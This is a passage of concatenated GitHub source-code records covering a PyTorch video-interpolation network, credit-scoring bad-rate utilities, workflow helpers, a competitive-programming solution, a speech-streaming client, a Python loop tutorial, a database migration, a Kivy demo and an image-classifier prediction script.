nn.Sequential(\n\t\t\t\tnn.Conv2d(in_channel, out_channel, kernel_size, stride=1, padding=kernel_size//2),\n\t\t\t\tnn.PReLU(),\n\t\t\t\tnn.Conv2d(out_channel, out_channel, kernel_size, stride=1, padding=kernel_size//2),\n\t\t\t\tnn.PReLU(),\n\t\t\t\tnn.Conv2d(out_channel, out_channel, kernel_size, stride=1, padding=kernel_size//2)\n\t\t\t\t)\t\n\t\tif (self.out_channel != self.in_channel) and shortcut_conv:\n\t\t\tself.conv = nn.Conv2d(in_channel, out_channel, kernel_size, stride=1, padding=kernel_size//2)\n\t\t# normal_init_net_conv(self.net)\n\t\tself.shortcut_conv = shortcut_conv\n\t\t\t\n\tdef forward(self, input):\n\t\tassert input.size(1) == self.in_channel, [ input.size(1), self.in_channel ]\n\t\tif self.shortcut_conv:\n\t\t\tif self.out_channel != self.in_channel:\n\t\t\t\treturn self.net(input) + self.conv(input)\n\t\t\telse:\n\t\t\t\treturn self.net(input) + input\n\t\telse:\n\t\t\treturn self.net(input) \n\nclass Upsample(nn.Module):\n\tdef __init__(self, in_channel, out_channel, kernel_size=3):\n\t\tsuper(Upsample, self).__init__()\n\t\tself.in_channel = in_channel\n\t\tself.out_channel = out_channel\n\t\tself.kernel_size = kernel_size\n\t\tself.net = nn.Sequential(\n\t\t\tnn.PReLU(),\n\t\t\tnn.Conv2d(in_channel, out_channel, kernel_size, stride=1, padding=kernel_size//2),\n\t\t\tnn.PReLU(),\n\t\t\tnn.Conv2d(out_channel, out_channel, kernel_size, stride=1, padding=kernel_size//2)\n\t\t\t)\n\t\t# normal_init_net_conv(self.net)\n\n\tdef forward(self, input):\n\t\tassert input.size(1) == self.in_channel, [ input.size(1), self.in_channel ]\n\t\treturn self.net(F.interpolate(input, scale_factor=2, mode='bilinear', align_corners=True))\n\n\nclass Downsample(nn.Module):\n\tdef __init__(self, in_channel, out_channel, kernel_size=3):\n\t\tsuper(Downsample, self).__init__()\n\t\tself.in_channel = in_channel\n\t\tself.out_channel = out_channel\n\t\tself.kernel_size = kernel_size\n\t\tself.net = nn.Sequential(\n\t\t\tnn.PReLU(),\n\t\t\tnn.Conv2d(in_channel, out_channel, kernel_size, stride=2, padding=kernel_size//2),\n\t\t\tnn.PReLU(),\n\t\t\tnn.Conv2d(out_channel, out_channel, kernel_size, stride=1, padding=kernel_size//2)\n\t\t\t)\n\t\t# normal_init_net_conv(self.net)\n\n\tdef forward(self, input):\n\t\tassert input.size(1) == self.in_channel, [ input.size(1), self.in_channel ]\n\t\treturn self.net(input)\n\n\nclass Downflow(nn.Module):\n\tdef __init__(self, in_channels, kernel_size=3):\n\t\tsuper(Downflow, self).__init__()\n\t\tself.in_channels = in_channels\n\t\tself.row0 = Lateral(in_channels[0], kernel_size, shortcut_conv=False)\n\t\tself.row1 = Lateral(in_channels[1], kernel_size, shortcut_conv=False)\n\t\tself.row2 = Lateral(in_channels[2], kernel_size, shortcut_conv=False)\n\t\tself.down01 = Downsample(in_channels[0], in_channels[1])\n\t\tself.down12 = Downsample(in_channels[1], in_channels[2])\n\n\tdef forward(self, row0_input, row1_input, row2_input):\n\t\tassert row0_input.size(1) == self.in_channels[0], [ row0_input.size(1), self.in_channels[0] ]\n\t\tassert row1_input.size(1) == self.in_channels[1], [ row1_input.size(1), self.in_channels[1] ]\n\t\tassert row2_input.size(1) == self.in_channels[2], [ row2_input.size(1), self.in_channels[2] ]\n\n\t\trow0_output = self.row0(row0_input)\n\t\trow1_output = self.row1(row1_input)\n\t\trow2_output = self.row2(row2_input)\n\n\t\trow1_output = self.down01(row0_output) + row1_output\n\t\trow2_output = self.down12(row1_output) + row2_output\n\n\t\treturn row0_output, row1_output, row2_output\n\n\nclass Upflow(nn.Module):\n\tdef 
__init__(self, in_channels, kernel_size=3):\n\t\tsuper(Upflow, self).__init__()\n\t\tself.in_channels = in_channels\n\t\tself.row0 = Lateral(in_channels[0], kernel_size, shortcut_conv=False)\n\t\tself.row1 = Lateral(in_channels[1], kernel_size, shortcut_conv=False)\n\t\tself.row2 = Lateral(in_channels[2], kernel_size, shortcut_conv=False)\n\t\tself.up10 = Upsample(in_channels[1], in_channels[0])\n\t\tself.up21 = Upsample(in_channels[2], in_channels[1])\n\n\tdef forward(self, row0_input, row1_input, row2_input):\n\t\tassert row0_input.size(1) == self.in_channels[0], [ row0_input.size(1), self.in_channels[0] ]\n\t\tassert row1_input.size(1) == self.in_channels[1], [ row1_input.size(1), self.in_channels[1] ]\n\t\tassert row2_input.size(1) == self.in_channels[2], [ row2_input.size(1), self.in_channels[2] ]\n\n\t\trow0_output = self.row0(row0_input)\n\t\trow1_output = self.row1(row1_input)\n\t\trow2_output = self.row2(row2_input)\n\n\t\trow1_output = self.up21(row2_output) + row1_output\n\t\trow0_output = self.up10(row1_output) + row0_output\n\t\t\n\t\treturn row0_output, row1_output, row2_output\n\n\nclass GridNet(nn.Module):\n\tdef __init__(self, n_channels, n_classes, mode='s2s', split_tail=False, seg_id=False):\n\t\tsuper(GridNet, self).__init__()\n\t\tself.mode = mode\n\t\tself.CELoss = nn.CrossEntropyLoss()\n\t\tself.SSIMLoss = SSIM()\n\t\tself.seg_act = nn.Softmax(dim=1)\n\t\tself.split_tail = split_tail\n\t\tself.seg_id = seg_id\n\t\tif mode == 'x2x':\n\t\t\tself.in_channel = 3*2\n\t\t\tself.out_channel = 3\n\t\telif mode == 'xs2x':\n\t\t\tif not seg_id:\n\t\t\t\tself.in_channel = (3+n_classes)*2\n\t\t\telse:\n\t\t\t\tself.in_channel = (3+1)*2\n\t\t\tself.out_channel = 3\n\t\telif mode == 's2s':\n\t\t\tif not seg_id:\n\t\t\t\tself.in_channel = n_classes*2\n\t\t\t\tself.out_channel = n_classes\n\t\t\telse:\n\t\t\t\tself.in_channel = 2\n\t\t\t\tself.out_channel = n_classes\t\t\t\t\n\t\telif mode == 'xs2s':\n\t\t\tif not seg_id:\n\t\t\t\tself.in_channel = (3+n_classes)*2\n\t\t\t\tself.out_channel = n_classes\n\t\t\telse:\n\t\t\t\tself.in_channel = (3+1)*2\n\t\t\t\tself.out_channel = n_classes\n\t\telif mode == 'xs2xs':\n\t\t\tif not split_tail:\n\t\t\t\tif not seg_id:\n\t\t\t\t\tself.in_channel = (3+n_classes)*2\n\t\t\t\t\tself.out_channel = (3+n_classes)\n\t\t\t\telse:\n\t\t\t\t\tself.in_channel = (3+1)*2\n\t\t\t\t\tself.out_channel = 3+n_classes\n\t\t\telse:\n\t\t\t\tif not seg_id:\n\t\t\t\t\tself.in_channel = (3+n_classes)*2\n\t\t\t\t\tself.out_channel = 3\n\t\t\t\t\tself.out_channel_seg = n_classes\n\t\t\t\telse:\n\t\t\t\t\tself.in_channel = (3+1)*2\n\t\t\t\t\tself.out_channel = 3\n\t\t\t\t\tself.out_channel_seg = n_classes\n\t\telif mode == 'wing':\n\t\t\tif not seg_id:\n\t\t\t\tself.in_channel = (3+n_classes)*2 + 3\n\t\t\t\tself.out_channel = n_classes\n\t\t\telse:\n\t\t\t\tself.in_channel = (3 + 1)*2 + 3\n\t\t\t\tself.out_channel = n_classes\n\n\t\telse:\n\t\t\traise Exception(\"mode doesnt exist !\")\n\n\t\tself.n_channels = n_channels\n\t\tself.head = Lateral(self.in_channel, 3, n_channels[0], shortcut_conv=True, prelu=False)\n\n\t\t# nn.Sequential(\n\t\t# \tnn.PReLU(),\n\t\t# \tnn.Conv2d(self.in_channel, n_channels[0], 3, stride=1, padding=1),\n\t\t# \tnn.PReLU(),\n\t\t# \tnn.Conv2d(n_channels[0], n_channels[0], 3, stride=1, padding=1)\n\t\t# \t)\n\n\t\tself.neck_down01 = Downsample(n_channels[0], n_channels[1], 3)\n\t\tself.neck_down12 = Downsample(n_channels[1], n_channels[2], 3)\n\n\t\tself.body_down0 = Downflow(n_channels, 3)\n\t\tself.body_down1 = Downflow(n_channels, 
3)\n\n\t\tself.body_up0 = Upflow(n_channels, 3)\n\t\tself.body_up1 = Upflow(n_channels, 3)\n\t\tself.body_up2 = Upflow(n_channels, 3)\n\n\t\tself.tail = Lateral(n_channels[0], 3, self.out_channel, shortcut_conv=False, prelu=True)\n\t\tif self.split_tail:\n\t\t\tself.tail_seg = Lateral(n_channels[0], 3, self.out_channel_seg, shortcut_conv=False, prelu=True)\n\n\t\tif self.mode[-1] == 'x' or self.mode == 'xs2xs':\n\t\t\tvgg19 = torchvision.models.vgg19(pretrained=True)\n\t\t\tself.vgg_net = my_vgg(vgg19)\n\t\t\tfor param in self.vgg_net.parameters():\n\t\t\t\tparam.requires_grad = False\n\n\n\tdef GDLLoss(self, input, gt):\n\t\tbs, c, h, w = input.size()\n\n\t\tw_gdl = torch.abs(input[:,:,:,1:] - input[:,:,:,:w-1])\n\t\th_gdl = torch.abs(input[:,:,1:,:] - input[:,:,:h-1,:])\n\n\t\tgt_w_gdl = torch.abs(gt[:,:,:,1:] - gt[:,:,:,:w-1])\n\t\tgt_h_gdl = torch.abs(gt[:,:,1:,:] - gt[:,:,:h-1,:])\n\t\t\n\t\tloss = torch.mean(torch.abs(w_gdl-gt_w_gdl)) + torch.mean(torch.abs(h_gdl-gt_h_gdl))\n\t\treturn loss\n\n\tdef _normalize(self, x):\n\t\tgpu_id = x.get_device()\n\t\treturn (x - mean.cuda(gpu_id)) / std.cuda(gpu_id)\n\n\tdef VGGLoss(self, pred_feat, true_feat):\n\t\tloss = 0\n\t\tfor i in range(len(pred_feat)):\n\t\t\tloss += (true_feat[i] - pred_feat[i]).abs().mean()\n\t\treturn loss/len(pred_feat)\n\n\tdef L1Loss(self, input, gt):\n\t\ttheta = 0.001\n\t\t# fg_indices = [4,5,6,7,11,12,13,14,15,16,17,18]\n\t\tdiff = (input-gt)**2\n\t\t# diff[:,fg_indices] = 4*diff[:,fg_indices]\n\t\treturn torch.sqrt(diff + theta**2)\n\n\n\tdef forward(self, input, gt=None):\n\t\tassert input.size(1) == self.in_channel, [input.size(), self.in_channel]\n\n\t\t# change to anqi test method\n\t\t# if self.mode=='xs2xs':\n\t\t# \tinput[:,:6] = postprocess_output(input[:,:6])\n\t\t# \tgt[:,:3] = postprocess_output(gt[:,:3])\n\n\t\trow0_out = self.head(input)\n\t\trow1_out = self.neck_down01(row0_out)\n\t\trow2_out = self.neck_down12(row1_out)\n\n\t\trow0_out, row1_out, row2_out = self.body_down0(row0_out, row1_out, row2_out)\n\t\trow0_out, row1_out, row2_out = self.body_down1(row0_out, row1_out, row2_out)\n\t\trow0_out, row1_out, row2_out = self.body_up0(row0_out, row1_out, row2_out)\n\t\trow0_out, row1_out, row2_out = self.body_up1(row0_out, row1_out, row2_out)\n\t\tout, row1_out, row2_out = self.body_up2(row0_out, row1_out, row2_out)\n\n\t\tif not self.split_tail:\n\t\t\tif self.mode =='wing':\n\t\t\t\tout = self.seg_act(self.tail(out))\n\t\t\telif self.mode[-1] != 's':\n\t\t\t\tout = F.tanh(self.tail(out))\n\t\t\t\t# print(\"hhhh\")\n\t\t\telse:\n\t\t\t\tout = self.seg_act(self.tail(out))\n\t\t\t\t# print(torch.nonzero(out).size(0))\n\t\telse:\n\t\t\tassert self.mode=='xs2xs'\n\t\t\tout_seg =self.tail_seg(out)\n\t\t\tout = F.tanh(self.tail(out))\n\n\t\tl1_loss = None\n\t\tgdl_loss = None\n\t\tvgg_loss = None\n\t\tce_loss = None\n\t\tssim_loss = None\n\t\t\t\n\n\t\tif self.training:\n\t\t\t# if self.mode.split('2')[1] in ['x','xs'] or (not self.seg_id ):\n\t\t\tif self.mode[-1] == 'x':\n\t\t\t\tgdl_loss = self.GDLLoss(preprocess_norm(out), preprocess_norm(gt))\n\t\t\t\tl1_loss = self.L1Loss(preprocess_norm(out), preprocess_norm(gt))\n\t\t\t\tssim_loss = self.SSIMLoss(preprocess_norm(out), preprocess_norm(gt)).mean()\n\n\t\t\t\tpredict_feat = self.vgg_net(preprocess_norm(out))\n\t\t\t\ttrue_feat = self.vgg_net(preprocess_norm(gt))\n\t\t\t\tvgg_loss = self.VGGLoss(predict_feat, true_feat)\n\n\t\t\telif self.mode == 'wing' or self.mode.split('2')[1] == 's' :\n\t\t\t\t# gdl_loss = self.GDLLoss(out, gt)\n\t\t\t\t# l1_loss 
= self.L1Loss(out, gt)\n\t\t\t\tif not self.seg_id:\n\t\t\t\t\tce_loss = self.CELoss(out, torch.argmax(gt, dim=1))\n\t\t\t\telse:\n\t\t\t\t\tce_loss = self.CELoss(out, gt.squeeze(1).long())\n\t\t\t\t\t# gdl_loss = self.GDLLoss(out, gt)\n\t\t\t\t\t# l1_loss = self.L1Loss(out, gt)\n\t\t\t\tvgg_loss = None\n\t\t\telif self.mode == 'xs2xs': ####################### try here\n\t\t\t\t# if self.ce:\n\t\t\t\t# if self.seg_id:\n\t\t\t\t# gdl_loss = self.GDLLoss(out, gt[:,:3])\n\t\t\t\t# l1_loss = self.L1Loss(out, gt[:,:3])\n\t\t\t\t# ssim_loss = 1 - self.SSIMLoss(postprocess_output(out), postprocess_output(gt[:, :3])).mean()\n\t\t\t\tgdl_loss = self.GDLLoss(preprocess_norm(out), preprocess_norm(gt[:,:3]))\n\t\t\t\tl1_loss = self.L1Loss(preprocess_norm(out), preprocess_norm(gt[:,:3]))\n\t\t\t\tssim_loss = self.SSIMLoss(preprocess_norm(out), preprocess_norm(gt[:, :3])).mean()\n\t\t\t\tif not self.seg_id:\n\t\t\t\t\tce_loss = self.CELoss(out_seg, torch.argmax(gt[:, 3:], dim=1))\n\t\t\t\telse:\n\t\t\t\t\tce_loss = self.CELoss(out_seg, gt[:, 3:].squeeze(1).long())\n\t\t\t\t# else:\n\t\t\t\t# \tgdl_loss = self.GDLLoss(out, gt)\n\t\t\t\t# \tl1_loss = self.L1Loss(out, gt)\n\t\t\t\t# else:\n\t\t\t\t# gdl_loss = self.GDLLoss(torch.cat([out, out_seg], dim=1), gt)\n\t\t\t\t# l1_loss = self.L1Loss(torch.cat([out, out_seg], dim=1), gt)\n\t\t\t\tpredict_feat = self.vgg_net(preprocess_norm(out))\n\t\t\t\ttrue_feat = self.vgg_net(preprocess_norm(gt[:, :3]))\n\t\t\t\t\n\t\t\t\tvgg_loss = self.VGGLoss(predict_feat, true_feat)\n\t\t\t# \telse:\n\t\t\t# \t\tvgg_loss = None\n\t\t\t# else:\n\t\t\t# \tvgg_loss = None\n\n\t\t\t# if self.seg_id:\n\t\t\t# \tif self.mode.split('2')[1] == 's':\n\t\t\t# \t\tce_loss = self.celoss(out, gt)\n\t\t\t# \telse: # xs2xs\n\t\t\t# \t\tce_loss = self.celoss(out_seg, gt[:, 3].long())\n\t\t\t# else:\n\t\t\t# \tce_loss = None\n\n\t\tif self.mode == 'xs2xs' and self.split_tail:\n\t\t\tout_seg = self.seg_act(out_seg)\n\t\t\tout = torch.cat([out, out_seg], dim=1)\n\n\t\t\t### todo laplacian pyramid loss for image ###\n\n\t\treturn out, l1_loss, gdl_loss, vgg_loss, ce_loss, ssim_loss\n\n\n\n","repo_name":"lzhangbj/deep_video_interpolation_extrapolation","sub_path":"nets/grid_net.py","file_name":"grid_net.py","file_ext":"py","file_size_in_byte":12550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7820299227","text":"\nimport pandas as pd\nimport numpy as np\n\n'''Bad-rate calculation for each bin.'''\ndef binbadrate(df, var, target, grantRateIndicator=0):\n    '''\n    :param df: dataset on which the good/bad ratio is computed\n    :param var: feature whose bins the good/bad ratio is computed for\n    :param target: good/bad label column\n    :param grantRateIndicator: 1 to also return the overall bad-sample rate, 0 otherwise\n    :return: bad-sample rate per bin, plus the overall bad-sample rate (when grantRateIndicator==1)\n    '''\n    total = df.groupby([var])[target].count()\n    total = pd.DataFrame({'total': total})\n    bad = df.groupby([var])[target].sum()\n    bad = pd.DataFrame({'bad': bad})\n    regroup = total.merge(bad, left_index=True, right_index=True, how='left') # left-join the two data frames\n    regroup.reset_index(level=0, inplace=True)\n    regroup['bad_rate'] = regroup.apply(lambda x: x.bad * 1.0 / x.total, axis=1)\n    dicts = dict(zip(regroup[var],regroup['bad_rate']))\n    if grantRateIndicator==0:\n        return (dicts, regroup)\n    N = sum(regroup['total'])\n    B = sum(regroup['bad'])\n    overallRate = B * 1.0 / N\n    return dicts, regroup, overallRate\n\n\n\n'''Monotonicity check for the binned bad rate.'''\n## determine whether the bad rate is monotone along the sortByVar\ndef monotone(df, sortByVar, target):\n    '''\n    :param df: the dataset containing the column which should be monotone with the bad rate, and the bad column\n    
:param sortByVar: the column which should be monotone with the bad rate\n    :param target: the bad column\n    :param special_attribute: some attributes should be excluded when checking monotone\n    :return:\n    '''\n    notnull_df = df.loc[~df[sortByVar].isnull()] # drop rows where the value is null\n    if len(set(notnull_df[sortByVar])) <= 2:\n        return True\n    regroup = binbadrate(notnull_df, sortByVar, target)[1] # reuse the binned bad-rate helper defined above\n    combined = zip(regroup['total'],regroup['bad'])\n    badRate = [x[1]*1.0/x[0] for x in combined]\n\n    # monotonicity test: each interior bin must continue the trend of its neighbours\n    badRateMonotone = [(badRate[i] < badRate[i+1] and badRate[i] > badRate[i-1]) or (badRate[i] > badRate[i+1] and badRate[i] < badRate[i-1]) for i in range(1,len(badRate)-1)]\n\n    Monotone = len(set(badRateMonotone))\n    if Monotone == 1 and list(set(badRateMonotone))[0]==True:\n        return True\n    else:\n        return False\n\n\n\n'''Null-value check: if more than half of a column is null, or the column has only one distinct value, the column is flagged as unusable.'''\ndef check_nullvalue(dataframe):\n    '''\n    :param dataframe: target data frame\n    :return: list of unusable columns\n    '''\n    column=list(dataframe.columns)\n\n    use_list = []\n    unuse_list = []\n    for key in column:\n        if dataframe[dataframe[key].isnull()].shape[0] typing.Mapping[str, Type[\"ProcessingModule\"]]:\n\n    from dharpa.processing.processing_module import ProcessingModule\n    from dharpa.workflows import workflow  # noqa\n\n    if not modules_to_load:\n        modules_to_load = DEFAULT_MODULES_TO_LOAD\n\n    all_module_clases = get_subclass_map(\n        ProcessingModule,\n        preload_modules=modules_to_load,\n        key_func=get_module_name_from_class,\n        override_duplicate_class=True,\n    )\n    return all_module_clases\n\n\ndef find_workflow_descriptions(\n    path: Union[str, Path], exclude_dirs: typing.Iterable[str] = DEFAULT_EXCLUDE_DIRS\n) -> typing.Dict[str, typing.Mapping[str, typing.Any]]:\n\n    if isinstance(path, str):\n        path = Path(os.path.expanduser(path))\n\n    result: typing.Dict[str, typing.Mapping[str, typing.Any]] = {}\n    for root, dirnames, filenames in os.walk(path, topdown=True):\n\n        if exclude_dirs:\n            dirnames[:] = [d for d in dirnames if d not in exclude_dirs]\n\n        for filename in [\n            f\n            for f in filenames\n            if os.path.isfile(os.path.join(root, f))\n            and any(f.endswith(ext) for ext in VALID_WORKFLOW_FILE_EXTENSIONS)\n        ]:\n\n            path = os.path.join(root, filename)\n            data = get_data_from_file(path)\n\n            name = data.get(MODULE_TYPE_NAME_KEY, None)\n            if name is None:\n                name = filename.split(\".\", maxsplit=1)[0]\n\n            if name in result.keys():\n                raise Exception(f\"Duplicate workflow name: {name}\")\n            result[name] = {\"data\": data, \"path\": path}\n\n    return result\n\n\ndef generate_workflow_processing_class_from_config(\n    module_name: str, config: \"ProcessingConfig\"\n) -> typing.Type[\"WorkflowProcessingModule\"]:\n\n    _workflow_config = config.dict()[\"module_config\"]\n\n    def init(self, **m_config: typing.Any):\n        m_config.update(_workflow_config)\n        m_config.setdefault(\"meta\", {}).update(config.meta)\n\n        if not m_config.get(\"workflow_id\", None):\n            m_config[\"workflow_id\"] = config.module_type\n\n        super(self.__class__, self).__init__(**m_config)\n\n    from dharpa.models import WorkflowProcessingModuleConfigDynamic\n    from dharpa.workflows.workflow import WorkflowProcessingModule\n\n    attrs = {\n        \"__init__\": init,\n        \"_processing_step_config_cls\": WorkflowProcessingModuleConfigDynamic,\n        \"_module_name\": module_name,\n    }\n    d = config.meta.get(\"doc\", None)\n    if d:\n        attrs[\"__doc__\"] = d\n\n    cls = type(\n        f\"Workflow{to_camel_case(module_name, capitalize=True)}\",\n        (WorkflowProcessingModule,),\n        attrs,\n    )\n    return cls\n\n\ndef create_workflow_modules(\n    *configs: typing.Union[\"WorkflowModule\", typing.Mapping],\n    workflow_id: str = None,\n    
force_mappings: bool = True,\n) -> typing.List[\"WorkflowModule\"]:\n\n from dharpa.models import ProcessingConfig\n from dharpa.workflows.modules import WorkflowModule\n from dharpa.workflows.workflow import DharpaWorkflow\n\n result = []\n module_ids: typing.Set[str] = set()\n\n for c in configs:\n\n if isinstance(c, WorkflowModule):\n if force_mappings:\n raise TypeError(\n \"Using WorkflowModule classes not allowed in config (in this case).\"\n )\n if c.workflow_id != workflow_id:\n raise ValueError(\n f\"Invalid workflow id '{c.workflow_id}' for module '{c.alias}': must match '{workflow_id}'\"\n )\n m = c\n elif isinstance(c, typing.Mapping):\n\n _c = dict(c)\n m_id = _c.pop(\"module_alias\", None)\n input_links = _c.pop(\"input_links\", None)\n processing_config = ProcessingConfig.from_dict(**_c)\n\n if m_id is None:\n m_id = processing_config.module_type\n\n if not workflow_id:\n workflow_id = m_id\n\n if processing_config.is_pipeline:\n m = DharpaWorkflow(\n alias=m_id,\n workflow_id=workflow_id,\n processing_config=processing_config,\n input_links=input_links,\n )\n else:\n m = WorkflowModule(\n alias=m_id,\n workflow_id=workflow_id,\n processing_config=processing_config,\n input_links=input_links,\n )\n # m = WorkflowModule.from_dict(**c)\n else:\n raise TypeError(\n f\"Can't create workflow modules, invalid type for module: '{type(c)}'\"\n )\n\n if m.alias in module_ids:\n raise ValueError(\n f\"Can't parse module configs: duplicate module ids: {m.alias}\"\n )\n module_ids.add(m.alias)\n result.append(m)\n\n return result\n\n\n_AUTO_MODULE_ID: typing.Dict[str, int] = {}\n\n\ndef get_auto_module_alias(\n module_cls: typing.Union[typing.Type, str], use_incremental_ids: bool = False\n) -> str:\n \"\"\"Return an id for a module obj of a provided module class.\n\n If 'use_incremental_ids' is set to True, a unique id is returned.\n\n Args:\n module_cls (Type): the module class (inherits from DharpaModule)\n use_incremental_ids (bool): whether to return a unique (incremental) id\n\n Returns:\n str: a module id\n \"\"\"\n\n if isinstance(module_cls, str):\n name = module_cls\n else:\n name = get_module_name_from_class(module_cls)\n if not use_incremental_ids:\n return name\n\n nr = _AUTO_MODULE_ID.setdefault(name, 0)\n _AUTO_MODULE_ID[name] = nr + 1\n\n return f\"{name}_{nr}\"\n","repo_name":"DHARPA-Project/dharpa-toolbox","sub_path":"src/dharpa/workflows/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35840851002","text":"'''\nstart 20220308\nend\n'''\n\nimport sys\n\nwhile True:\n case = list(map(int,sys.stdin.readline().split()))\n if case == [0]:\n break\n n = case[0]\n l = case[1:]\n stack_val = []\n stack_idx = []\n stack_back = []\n m = 0\n for idx, val in enumerate(l):\n b = 0\n while stack_val and stack_val[-1] > val:\n tmp1 = stack_val.pop()\n tmp2 = stack_idx.pop()\n tmp3 = stack_back.pop()\n m = max(m,tmp1*(idx-tmp2+tmp3))\n b+=(tmp3+1)\n stack_val.append(val)\n stack_idx.append(idx)\n stack_back.append(b)\n for idx, val in enumerate(stack_val):\n tmp = (n-stack_idx[idx]+stack_back[idx])*val\n m = max(m,tmp)\n print(m)","repo_name":"99taeha/Baekjun","sub_path":"p/6549.py","file_name":"6549.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"7119527326","text":"import asyncio\nimport json\nimport logging\nimport time\nfrom io import 
DEFAULT_BUFFER_SIZE\nimport pyaudio\nimport requests\n\nimport websockets\nfrom keys import get_client_data\nfrom requests import Session\n\nAPI_BASE = \"https://openapi.vito.ai\"\n\nSAMPLE_RATE = 8000\nRECORD_SECONDS = 30\nCHUNK = 1024\nCHANNELS = 1\n\np = pyaudio.PyAudio()\n\nclass Client :\n    def __init__(self, client_data) :\n        super().__init__()\n        self.logger = logging.getLogger(__name__)\n        self.client_data = client_data\n        self._sess = Session()\n        self._token = None\n\n    @property\n    def token(self) :\n        if self._token is None or self._token[\"expire_at\"] < time.time() :\n            resp = self._sess.post(\n                API_BASE + \"/v1/authenticate\",\n                data = self.client_data\n            )\n\n            resp.raise_for_status()\n            self._token = resp.json()\n            print(self._token)\n        return self._token[\"access_token\"]\n\n    async def streaming_transcribe(self, filename, config=None) :\n        if config is None:\n            config = dict(sample_rate = str(SAMPLE_RATE), encoding = \"LINEAR16\", use_itn = \"true\", use_disfluency_filter = \"true\", use_profanity_filter = \"false\")\n\n        stream = p.open(\n            format=pyaudio.paInt16,\n            channels=CHANNELS,\n            rate=SAMPLE_RATE,\n            input=True,\n            output=True,\n            frames_per_buffer=CHUNK\n        )\n\n        STREAMING_ENDPOINT = \"wss://{}/v1/transcribe:streaming?{}\".format(\n            API_BASE.split(\"//\")[1], \"&\".join(map(\"=\".join, config.items()))\n        )\n\n        print(STREAMING_ENDPOINT)\n\n        conn_kwargs = dict(extra_headers={\"Authorization\" : \"bearer \" + self.token})\n\n        async def streamer(websocket) :\n            for i in range(0, int(SAMPLE_RATE / CHUNK * RECORD_SECONDS)) :\n                buff = stream.read(CHUNK)\n                if buff is None or len(buff) == 0 :\n                    break\n                await websocket.send(buff)\n            await websocket.send(\"EOS\")\n\n        async def transcriber(websocket) :\n            async for msg in websocket :\n                msg = json.loads(msg)\n                if msg[\"final\"] :\n                    print(\"final ended with \" + msg[\"alternatives\"][0][\"text\"])\n\n        async with websockets.connect(STREAMING_ENDPOINT, **conn_kwargs) as websocket :\n            await asyncio.gather(\n                streamer(websocket),\n                transcriber(websocket),\n            )\n\nif __name__ == \"__main__\" :\n    client_data = get_client_data()\n    client = Client(client_data)\n\n    fname = \"../data/test.wav\"\n    asyncio.run(client.streaming_transcribe(fname))\n","repo_name":"SWMTeamCuriosity/mic_input_test","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12413181093","text":"i = int(input(\"Enter a new number\"))\n\nwhile (i<=40):\n    i = int(input(\"Enter a second new number\"))\n    print(i)\nprint(\"Done with the loop\") ## this print runs once the loop condition becomes false\n\n## the while loop keeps running until its condition becomes false\n\nj = int(input(\"Enter a number for the loop\"))\nwhile(j>10):\n    print(j)\n    j=j-2\nelse: \n    print(\"After the 'while' condition is over I am inside else\")","repo_name":"HELINCON/python_tutorial_udemy","sub_path":"basic/while_loop.py","file_name":"while_loop.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30201610404","text":"\"\"\"add_restoration_approval_type_registrar_dates\n\nRevision ID: 89fe33f436c1\nRevises: 08da65c4a94a\nCreate Date: 2023-03-29 15:10:24.319173\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '89fe33f436c1'\ndown_revision = '08da65c4a94a'\nbranch_labels = None\ndepends_on = 
None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('filings', sa.Column('application_date', sa.DateTime(timezone=True), nullable=True))\n op.add_column('filings', sa.Column('notice_date', sa.DateTime(timezone=True), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('filings', 'application_date')\n op.drop_column('filings', 'notice_date')\n # ### end Alembic commands ###\n","repo_name":"bcgov/lear","sub_path":"legal-api/migrations/versions/89fe33f436c1_add_restoration_approval_type_registrar_.py","file_name":"89fe33f436c1_add_restoration_approval_type_registrar_.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"18476239200","text":"import sys\n\n# Patch missing sys.argv[0] which is None for some reason when using PyOxidizer\n# Kivy fails on importing the library, because it tries to iterate on sys.argv[0]\nif sys.argv[0] is None:\n sys.argv[0] = sys.executable\n print(f\"Patched sys.argv to {sys.argv}\")\n\nimport kivy\nfrom kivy.app import App\nfrom kivy.uix.label import Label\n\n\nclass MyFirstKivyApp(App):\n def build(self):\n return Label(text=\"Hello World !\")\n\n\ndef main() -> None:\n kivy.require(\"2.0.0\")\n MyFirstKivyApp().run()\n\n\nif __name__ == \"__main__\":\n print(\"Launching HelloKivy from __main__\")\n main()\n","repo_name":"sureshjoshi/pants-plugins","sub_path":"examples/python/hellokivy/hellokivy/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"26186640141","text":"# Imports here\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\nfrom collections import OrderedDict\nfrom PIL import Image\nimport numpy as np\nimport seaborn as sns\nimport argparse\nimport json\n\n\n\n#arguments image prediction\nparser = argparse.ArgumentParser(description='Image classifier prediction directory')\n\nparser.add_argument('image_dir', help='image path directory', type=str)\nparser.add_argument('check_dir', help='checkpoint directory', type=str)\nparser.add_argument('--topk', help='top K most likely classes', type=int)\nparser.add_argument('--category_names', help='mapping of categories to real names', type=str)\nparser.add_argument('--gpu', help='turn on the GPU', type=str)\n\nresults = parser.parse_args()\n\n#Model loading function\ndef load_checkpoint(filepath):\n checkpoint = torch.load(filepath)\n \n #Checkpoint\n if checkpoint['arch'] == 'vgg13':\n model = models.vgg13(pretrained=True)\n else:\n model = 